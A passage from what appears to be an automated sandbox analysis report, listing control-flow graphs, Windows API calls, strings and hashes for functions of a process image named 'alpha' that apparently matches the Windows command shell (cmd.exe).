7ff7cd495069-7ff7cd495073 711->715 716 7ff7cd49505b-7ff7cd495067 711->716 712->693 715->693 715->712 716->693 729 7ff7cd4950dc-7ff7cd4950e6 GlobalFree 724->729 725->729 729->698
                                        APIs
                                        • InitializeCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7CD494D9A
                                          • Part of subcall function 00007FF7CD4958E4: EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,00007FF7CD4AC6DB), ref: 00007FF7CD4958EF
                                        • SetConsoleCtrlHandler.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7CD494DBB
                                        • _get_osfhandle.MSVCRT ref: 00007FF7CD494DCA
                                        • GetConsoleMode.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7CD494DE0
                                        • _get_osfhandle.MSVCRT ref: 00007FF7CD494DEE
                                        • GetConsoleMode.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7CD494E04
                                          • Part of subcall function 00007FF7CD490580: _get_osfhandle.MSVCRT ref: 00007FF7CD490589
                                          • Part of subcall function 00007FF7CD490580: SetConsoleMode.KERNELBASE ref: 00007FF7CD49059E
                                          • Part of subcall function 00007FF7CD490580: _get_osfhandle.MSVCRT ref: 00007FF7CD4905AF
                                          • Part of subcall function 00007FF7CD490580: GetConsoleMode.KERNELBASE ref: 00007FF7CD4905C5
                                          • Part of subcall function 00007FF7CD490580: _get_osfhandle.MSVCRT ref: 00007FF7CD4905EF
                                          • Part of subcall function 00007FF7CD490580: GetConsoleMode.KERNELBASE ref: 00007FF7CD490605
                                          • Part of subcall function 00007FF7CD490580: _get_osfhandle.MSVCRT ref: 00007FF7CD490632
                                          • Part of subcall function 00007FF7CD490580: SetConsoleMode.KERNELBASE ref: 00007FF7CD490647
                                          • Part of subcall function 00007FF7CD494A14: GetEnvironmentStringsW.KERNELBASE(?,?,00000000,00007FF7CD4949F1), ref: 00007FF7CD494A28
                                          • Part of subcall function 00007FF7CD494A14: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7CD4949F1), ref: 00007FF7CD494A66
                                          • Part of subcall function 00007FF7CD494A14: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7CD4949F1), ref: 00007FF7CD494A7D
                                          • Part of subcall function 00007FF7CD494A14: memmove.MSVCRT(?,?,00000000,00007FF7CD4949F1), ref: 00007FF7CD494A9A
                                          • Part of subcall function 00007FF7CD494A14: FreeEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000000,00007FF7CD4949F1), ref: 00007FF7CD494AA2
                                          • Part of subcall function 00007FF7CD494AD0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7CD488798), ref: 00007FF7CD494AD6
                                          • Part of subcall function 00007FF7CD494AD0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7CD488798), ref: 00007FF7CD494AEF
                                          • Part of subcall function 00007FF7CD495554: RegOpenKeyExW.KERNELBASE(?,00000000,?,00000001,?,00007FF7CD494E35), ref: 00007FF7CD4955DA
                                          • Part of subcall function 00007FF7CD495554: RegQueryValueExW.KERNELBASE ref: 00007FF7CD495623
                                          • Part of subcall function 00007FF7CD495554: RegQueryValueExW.KERNELBASE ref: 00007FF7CD495667
                                          • Part of subcall function 00007FF7CD495554: RegQueryValueExW.KERNELBASE ref: 00007FF7CD4956BE
                                          • Part of subcall function 00007FF7CD495554: RegQueryValueExW.KERNELBASE ref: 00007FF7CD495702
                                        • GetCommandLineW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7CD494E35
                                        • GetCommandLineW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7CD494E81
                                        • GetWindowsDirectoryW.API-MS-WIN-CORE-SYSINFO-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7CD494F69
                                        • GetConsoleOutputCP.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7CD494F95
                                        • GetCPInfo.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7CD494FB0
                                        • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7CD494FC1
                                        • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7CD494FD8
                                        • GetConsoleTitleW.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7CD494FF8
                                        • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7CD495037
                                        • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7CD49504B
                                        • GlobalFree.API-MS-WIN-CORE-HEAP-L2-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7CD4950DF
                                        • GetModuleHandleW.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7CD4950F2
                                        • GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7CD49510F
                                        • GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7CD495130
                                        • GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7CD49514A
                                        • free.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7CD495175
                                          • Part of subcall function 00007FF7CD493578: _get_osfhandle.MSVCRT ref: 00007FF7CD493584
                                          • Part of subcall function 00007FF7CD493578: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000014,00007FF7CD4832E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7CD49359C
                                          • Part of subcall function 00007FF7CD493578: GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000014,00007FF7CD4832E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7CD4935C3
                                          • Part of subcall function 00007FF7CD493578: AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF7CD4832E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7CD4935D9
                                          • Part of subcall function 00007FF7CD493578: GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00000014,00007FF7CD4832E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7CD4935ED
                                          • Part of subcall function 00007FF7CD493578: ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF7CD4832E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7CD493602
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1239041350.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000006.00000002.1239019582.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239076010.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239096724.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239096724.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239096724.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239096724.00007FF7CD4D4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239176210.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: Console$Mode_get_osfhandle$Heap$QueryValue$AddressAllocHandleProcProcess$CommandCriticalEnvironmentFreeInfoLineLockSectionSharedStrings$AcquireBufferCtrlDirectoryEnterFileGlobalHandlerInitializeModuleOpenOutputReleaseScreenTitleTypeWindowsfreememmove
                                        • String ID: CopyFileExW$IsDebuggerPresent$KERNEL32.DLL$SetConsoleInputExeNameW
                                        • API String ID: 1049357271-3021193919
                                        • Opcode ID: d2460cf6989233a7a4462fbac63f5e4cbe638dcbee7ad3df93fe443bd3d09fd5
                                        • Instruction ID: 84ee1871a17f2f0a977d3808aa3ffb817d6d8cbd0e53727e1156c100f72dfefc
                                        • Opcode Fuzzy Hash: d2460cf6989233a7a4462fbac63f5e4cbe638dcbee7ad3df93fe443bd3d09fd5
                                        • Instruction Fuzzy Hash: 8BC14121B0CA4296EA04BF52E814579F6A6FF89BA0FC48135DF2E43755FF3CA6458320
                                        Function 00007FF7CD493C24 Relevance: 37.0, APIs: 20, Strings: 1, Instructions: 289COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 732 7ff7cd493c24-7ff7cd493c61 733 7ff7cd493c67-7ff7cd493c99 call 7ff7cd48af14 call 7ff7cd48ca40 732->733 734 7ff7cd49ec5a-7ff7cd49ec5f 732->734 743 7ff7cd493c9f-7ff7cd493cb2 call 7ff7cd48b900 733->743 744 7ff7cd49ec97-7ff7cd49eca1 call 7ff7cd49855c 733->744 734->733 736 7ff7cd49ec65-7ff7cd49ec6a 734->736 738 7ff7cd49412e-7ff7cd49415b call 7ff7cd498f80 736->738 743->744 749 7ff7cd493cb8-7ff7cd493cbc 743->749 750 7ff7cd493cbf-7ff7cd493cc7 749->750 750->750 751 7ff7cd493cc9-7ff7cd493ccd 750->751 752 7ff7cd493cd2-7ff7cd493cd8 751->752 753 7ff7cd493ce5-7ff7cd493d62 GetCurrentDirectoryW towupper iswalpha 752->753 754 7ff7cd493cda-7ff7cd493cdf 752->754 756 7ff7cd493fb8 753->756 757 7ff7cd493d68-7ff7cd493d6c 753->757 754->753 755 7ff7cd493faa-7ff7cd493fb3 754->755 755->752 759 7ff7cd493fc6-7ff7cd493fec GetLastError call 7ff7cd49855c call 7ff7cd49a5d6 756->759 757->756 758 7ff7cd493d72-7ff7cd493dcd towupper GetFullPathNameW 757->758 758->759 760 7ff7cd493dd3-7ff7cd493ddd 758->760 762 7ff7cd493ff1-7ff7cd494007 call 7ff7cd49855c _local_unwind 759->762 760->762 763 7ff7cd493de3-7ff7cd493dfb 760->763 774 7ff7cd49400c-7ff7cd494022 GetLastError 762->774 765 7ff7cd493e01-7ff7cd493e11 763->765 766 7ff7cd4940fe-7ff7cd494119 call 7ff7cd49855c _local_unwind 763->766 765->766 770 7ff7cd493e17-7ff7cd493e28 765->770 775 7ff7cd49411a-7ff7cd49412c call 7ff7cd48ff70 call 7ff7cd49855c 766->775 773 7ff7cd493e2c-7ff7cd493e34 770->773 773->773 776 7ff7cd493e36-7ff7cd493e3f 773->776 777 7ff7cd493e95-7ff7cd493e9c 774->777 778 7ff7cd494028-7ff7cd49402b 774->778 775->738 782 7ff7cd493e42-7ff7cd493e55 776->782 779 7ff7cd493ecf-7ff7cd493ed3 777->779 780 7ff7cd493e9e-7ff7cd493ec2 call 7ff7cd492978 777->780 778->777 783 7ff7cd494031-7ff7cd494047 call 7ff7cd49855c _local_unwind 778->783 785 7ff7cd493ed5-7ff7cd493ef7 GetFileAttributesW 779->785 786 7ff7cd493f08-7ff7cd493f0b 779->786 792 7ff7cd493ec7-7ff7cd493ec9 780->792 788 7ff7cd493e66-7ff7cd493e8f GetFileAttributesW 782->788 789 7ff7cd493e57-7ff7cd493e60 782->789 799 7ff7cd49404c-7ff7cd494062 call 7ff7cd49855c _local_unwind 783->799 793 7ff7cd494067-7ff7cd494098 GetLastError call 7ff7cd49855c _local_unwind 785->793 794 7ff7cd493efd-7ff7cd493f02 785->794 796 7ff7cd493f0d-7ff7cd493f11 786->796 797 7ff7cd493f1e-7ff7cd493f40 SetCurrentDirectoryW 786->797 788->774 788->777 789->788 798 7ff7cd493f9d-7ff7cd493fa5 789->798 792->779 792->799 801 7ff7cd49409d-7ff7cd4940b3 call 7ff7cd49855c _local_unwind 793->801 794->786 794->801 803 7ff7cd493f13-7ff7cd493f1c 796->803 804 7ff7cd493f46-7ff7cd493f69 call 7ff7cd49498c 796->804 797->804 805 7ff7cd4940b8-7ff7cd4940de GetLastError call 7ff7cd49855c _local_unwind 797->805 798->782 799->793 801->805 803->797 803->804 815 7ff7cd4940e3-7ff7cd4940f9 call 7ff7cd49855c _local_unwind 804->815 816 7ff7cd493f6f-7ff7cd493f98 call 7ff7cd49417c 804->816 805->815 815->766 816->775
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1239041350.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000006.00000002.1239019582.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239076010.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239096724.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239096724.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239096724.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239096724.00007FF7CD4D4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239176210.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: _local_unwind$AttributesCurrentDirectoryErrorFileLasttowupper$FullNamePathiswalphamemset
                                        • String ID: :
                                        • API String ID: 1809961153-336475711
                                        • Opcode ID: db7a8accf24e76443df151eec26ec66c8909a5ebe3ef3b4491d16ca320e82ff4
                                        • Instruction ID: 429529aa4d0ebf8d1ce851f9278bb34ec020735cdf6d6dc2704783c09c140e57
                                        • Opcode Fuzzy Hash: db7a8accf24e76443df151eec26ec66c8909a5ebe3ef3b4491d16ca320e82ff4
                                        • Instruction Fuzzy Hash: 01D17D2270CB8191EA60AF16E4486B9F7A6FB85760F844135DF5E436A8FF3CE645CB10
                                        Function 00007FF7CD492394 Relevance: 26.5, APIs: 7, Strings: 8, Instructions: 213COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 914 7ff7cd492394-7ff7cd492416 memset call 7ff7cd48ca40 917 7ff7cd49e0d2-7ff7cd49e0da call 7ff7cd494c1c 914->917 918 7ff7cd49241c-7ff7cd492453 GetModuleFileNameW call 7ff7cd49081c 914->918 924 7ff7cd49e0db-7ff7cd49e0ee call 7ff7cd49498c 917->924 923 7ff7cd492459-7ff7cd492468 call 7ff7cd49081c 918->923 918->924 929 7ff7cd49e0f4-7ff7cd49e107 call 7ff7cd49498c 923->929 930 7ff7cd49246e-7ff7cd49247d call 7ff7cd49081c 923->930 924->929 937 7ff7cd49e10d-7ff7cd49e123 929->937 935 7ff7cd492483-7ff7cd492492 call 7ff7cd49081c 930->935 936 7ff7cd492516-7ff7cd492529 call 7ff7cd49498c 930->936 935->937 947 7ff7cd492498-7ff7cd4924a7 call 7ff7cd49081c 935->947 936->935 940 7ff7cd49e13f-7ff7cd49e17a _wcsupr 937->940 941 7ff7cd49e125-7ff7cd49e139 wcschr 937->941 945 7ff7cd49e181-7ff7cd49e199 wcsrchr 940->945 946 7ff7cd49e17c-7ff7cd49e17f 940->946 941->940 944 7ff7cd49e27c 941->944 949 7ff7cd49e283-7ff7cd49e29b call 7ff7cd49498c 944->949 948 7ff7cd49e19c 945->948 946->948 956 7ff7cd49e2a1-7ff7cd49e2c3 _wcsicmp 947->956 957 7ff7cd4924ad-7ff7cd4924c5 call 7ff7cd493c24 947->957 951 7ff7cd49e1a0-7ff7cd49e1a7 948->951 949->956 951->951 954 7ff7cd49e1a9-7ff7cd49e1bb 951->954 958 7ff7cd49e1c1-7ff7cd49e1e6 954->958 959 7ff7cd49e264-7ff7cd49e277 call 7ff7cd491300 954->959 964 7ff7cd4924ca-7ff7cd4924db 957->964 962 7ff7cd49e1e8-7ff7cd49e1f1 958->962 963 7ff7cd49e21a 958->963 959->944 966 7ff7cd49e201-7ff7cd49e210 962->966 967 7ff7cd49e1f3-7ff7cd49e1f6 962->967 965 7ff7cd49e21d-7ff7cd49e21f 963->965 968 7ff7cd4924e9-7ff7cd492514 call 7ff7cd498f80 964->968 969 7ff7cd4924dd-7ff7cd4924e4 ??_V@YAXPEAX@Z 964->969 965->949 970 7ff7cd49e221-7ff7cd49e228 965->970 966->963 973 7ff7cd49e212-7ff7cd49e218 966->973 967->966 972 7ff7cd49e1f8-7ff7cd49e1ff 967->972 969->968 974 7ff7cd49e254-7ff7cd49e262 970->974 975 7ff7cd49e22a-7ff7cd49e231 970->975 972->966 972->967 973->965 974->944 977 7ff7cd49e234-7ff7cd49e237 975->977 977->974 978 7ff7cd49e239-7ff7cd49e242 977->978 978->974 979 7ff7cd49e244-7ff7cd49e252 978->979 979->974 979->977
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1239041350.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000006.00000002.1239019582.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239076010.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239096724.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239096724.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239096724.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239096724.00007FF7CD4D4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239176210.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: memset$EnvironmentFileModuleNameVariable_wcsuprwcschr
                                        • String ID: $P$G$.COM;.EXE;.BAT;.CMD;.VBS;.JS;.WS;.MSC$COMSPEC$KEYS$PATH$PATHEXT$PROMPT$\CMD.EXE
                                        • API String ID: 2622545777-4197029667
                                        • Opcode ID: bd59c29d01747683900c9969ab54c99ddb5983c61e93a73bd4a825f93bf20993
                                        • Instruction ID: cc76b106986b887df7b32274dd9022eca5032ce636882b52ebf2766c3929e07b
                                        • Opcode Fuzzy Hash: bd59c29d01747683900c9969ab54c99ddb5983c61e93a73bd4a825f93bf20993
                                        • Instruction Fuzzy Hash: B4917F21B0DA4295EE24AF52D854AB8A3A6FF58B64FC44135CF6E47295FE3CE704C720
                                        Function 00007FF7CD490580 Relevance: 22.8, APIs: 12, Strings: 1, Instructions: 82COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1239041350.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000006.00000002.1239019582.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239076010.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239096724.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239096724.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239096724.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239096724.00007FF7CD4D4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239176210.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: ConsoleMode_get_osfhandle
                                        • String ID: CMD.EXE
                                        • API String ID: 1606018815-3025314500
                                        • Opcode ID: 9863d994e227a964b461aa116ba59a1d246fb461d9866754b2e1da54715f6750
                                        • Instruction ID: 29a60f4e52564ba105571b9adc3b067fd57fdd59db2a4144ebf9c66fae0487ad
                                        • Opcode Fuzzy Hash: 9863d994e227a964b461aa116ba59a1d246fb461d9866754b2e1da54715f6750
                                        • Instruction Fuzzy Hash: DB41CC31B0DA02DBE604AF55E855578BBA1BB99771FC89179CF2E42360EF3DA604C620
                                        Function 00007FF7CD48C620 Relevance: 16.1, APIs: 7, Strings: 2, Instructions: 312COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 992 7ff7cd48c620-7ff7cd48c66f GetConsoleTitleW 993 7ff7cd49c5f2 992->993 994 7ff7cd48c675-7ff7cd48c687 call 7ff7cd48af14 992->994 997 7ff7cd49c5fc-7ff7cd49c60c GetLastError 993->997 998 7ff7cd48c689 994->998 999 7ff7cd48c68e-7ff7cd48c69d call 7ff7cd48ca40 994->999 1000 7ff7cd49c5e3 call 7ff7cd483278 997->1000 998->999 1004 7ff7cd49c5e8-7ff7cd49c5ed call 7ff7cd49855c 999->1004 1005 7ff7cd48c6a3-7ff7cd48c6ac 999->1005 1000->1004 1004->993 1007 7ff7cd48c6b2-7ff7cd48c6c5 call 7ff7cd48b9c0 1005->1007 1008 7ff7cd48c954-7ff7cd48c95e call 7ff7cd49291c 1005->1008 1015 7ff7cd48c9b5-7ff7cd48c9b8 call 7ff7cd495c6c 1007->1015 1016 7ff7cd48c6cb-7ff7cd48c6ce 1007->1016 1013 7ff7cd48c964-7ff7cd48c96b call 7ff7cd4889c0 1008->1013 1014 7ff7cd49c5de-7ff7cd49c5e0 1008->1014 1021 7ff7cd48c970-7ff7cd48c972 1013->1021 1014->1000 1020 7ff7cd48c9bd-7ff7cd48c9c9 call 7ff7cd49855c 1015->1020 1016->1004 1019 7ff7cd48c6d4-7ff7cd48c6e9 1016->1019 1022 7ff7cd48c6ef-7ff7cd48c6fa 1019->1022 1023 7ff7cd49c616-7ff7cd49c620 call 7ff7cd49855c 1019->1023 1039 7ff7cd48c9d0-7ff7cd48c9d7 1020->1039 1021->997 1028 7ff7cd48c978-7ff7cd48c99a towupper 1021->1028 1024 7ff7cd48c700-7ff7cd48c713 1022->1024 1025 7ff7cd49c627 1022->1025 1023->1025 1029 7ff7cd49c631 1024->1029 1030 7ff7cd48c719-7ff7cd48c72c 1024->1030 1025->1029 1033 7ff7cd48c9a0-7ff7cd48c9a9 1028->1033 1035 7ff7cd49c63b 1029->1035 1034 7ff7cd48c732-7ff7cd48c747 call 7ff7cd48d3f0 1030->1034 1030->1035 1033->1033 1036 7ff7cd48c9ab-7ff7cd48c9af 1033->1036 1045 7ff7cd48c8ac-7ff7cd48c8af 1034->1045 1046 7ff7cd48c74d-7ff7cd48c750 1034->1046 1043 7ff7cd49c645 1035->1043 1036->1015 1037 7ff7cd49c60e-7ff7cd49c611 call 7ff7cd4aec14 1036->1037 1037->1023 1041 7ff7cd48c872-7ff7cd48c8aa call 7ff7cd49855c call 7ff7cd498f80 1039->1041 1042 7ff7cd48c9dd-7ff7cd49c6da SetConsoleTitleW 1039->1042 1042->1041 1053 7ff7cd49c64e-7ff7cd49c651 1043->1053 1045->1046 1052 7ff7cd48c8b5-7ff7cd48c8d3 wcsncmp 1045->1052 1049 7ff7cd48c752-7ff7cd48c764 call 7ff7cd48bd38 1046->1049 1050 7ff7cd48c76a-7ff7cd48c76d 1046->1050 1049->1004 1049->1050 1056 7ff7cd48c840-7ff7cd48c84b call 7ff7cd48cb40 1050->1056 1057 7ff7cd48c773-7ff7cd48c77a 1050->1057 1052->1050 1058 7ff7cd48c8d9 1052->1058 1059 7ff7cd49c657-7ff7cd49c65b 1053->1059 1060 7ff7cd48c80d-7ff7cd48c811 1053->1060 1078 7ff7cd48c856-7ff7cd48c86c 1056->1078 1079 7ff7cd48c84d-7ff7cd48c855 call 7ff7cd48cad4 1056->1079 1065 7ff7cd48c780-7ff7cd48c784 1057->1065 1058->1046 1059->1060 1061 7ff7cd48c9e2-7ff7cd48c9e7 1060->1061 1062 7ff7cd48c817-7ff7cd48c81b 1060->1062 1061->1062 1069 7ff7cd48c9ed-7ff7cd48c9f7 call 7ff7cd49291c 1061->1069 1067 7ff7cd48c821 1062->1067 1068 7ff7cd48ca1b-7ff7cd48ca1f 1062->1068 1070 7ff7cd48c78a-7ff7cd48c7a4 wcschr 1065->1070 1071 7ff7cd48c83d 1065->1071 1074 7ff7cd48c824-7ff7cd48c82d 1067->1074 1068->1067 1073 7ff7cd48ca25-7ff7cd49c6b3 call 7ff7cd483278 1068->1073 1089 7ff7cd49c684-7ff7cd49c698 call 7ff7cd483278 1069->1089 1090 7ff7cd48c9fd-7ff7cd48ca00 1069->1090 1076 7ff7cd48c7aa-7ff7cd48c7ad 1070->1076 1077 7ff7cd48c8de-7ff7cd48c8f7 1070->1077 1071->1056 1073->1004 1074->1074 1082 7ff7cd48c82f-7ff7cd48c837 1074->1082 1084 7ff7cd48c7b0-7ff7cd48c7b8 1076->1084 1085 7ff7cd48c900-7ff7cd48c908 1077->1085 1078->1039 1078->1041 1079->1078 1082->1065 1082->1071 1084->1084 1091 7ff7cd48c7ba-7ff7cd48c7c7 1084->1091 1085->1085 1092 7ff7cd48c90a-7ff7cd48c915 1085->1092 1089->1004 1090->1062 1098 7ff7cd48ca06-7ff7cd48ca10 call 7ff7cd4889c0 1090->1098 1091->1053 1093 7ff7cd48c7cd-7ff7cd48c7db 1091->1093 1094 7ff7cd48c917 1092->1094 1095 7ff7cd48c93a-7ff7cd48c944 1092->1095 1099 7ff7cd48c7e0-7ff7cd48c7e7 1093->1099 1100 7ff7cd48c920-7ff7cd48c928 1094->1100 1102 7ff7cd48ca2a-7ff7cd48ca2f call 7ff7cd499158 1095->1102 1103 7ff7cd48c94a 1095->1103 1098->1062 1111 7ff7cd48ca16-7ff7cd49c67f GetLastError call 7ff7cd483278 1098->1111 1105 7ff7cd48c800-7ff7cd48c803 1099->1105 1106 7ff7cd48c7e9-7ff7cd48c7f1 1099->1106 1107 7ff7cd48c932-7ff7cd48c938 1100->1107 1108 7ff7cd48c92a-7ff7cd48c92f 1100->1108 1102->1014 1103->1008 1105->1043 1113 7ff7cd48c809 1105->1113 1106->1105 1112 7ff7cd48c7f3-7ff7cd48c7fe 1106->1112 1107->1095 1107->1100 1108->1107 1111->1004 1112->1099 1112->1105 1113->1060
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1239041350.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000006.00000002.1239019582.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239076010.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239096724.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239096724.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239096724.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239096724.00007FF7CD4D4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239176210.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: ConsoleTitlewcschr
                                        • String ID: /$:
                                        • API String ID: 2364928044-4222935259
                                        • Opcode ID: 989dfed76e83e1e5127155f56046364be98515c6956e9669bb0cf7002a0e13e4
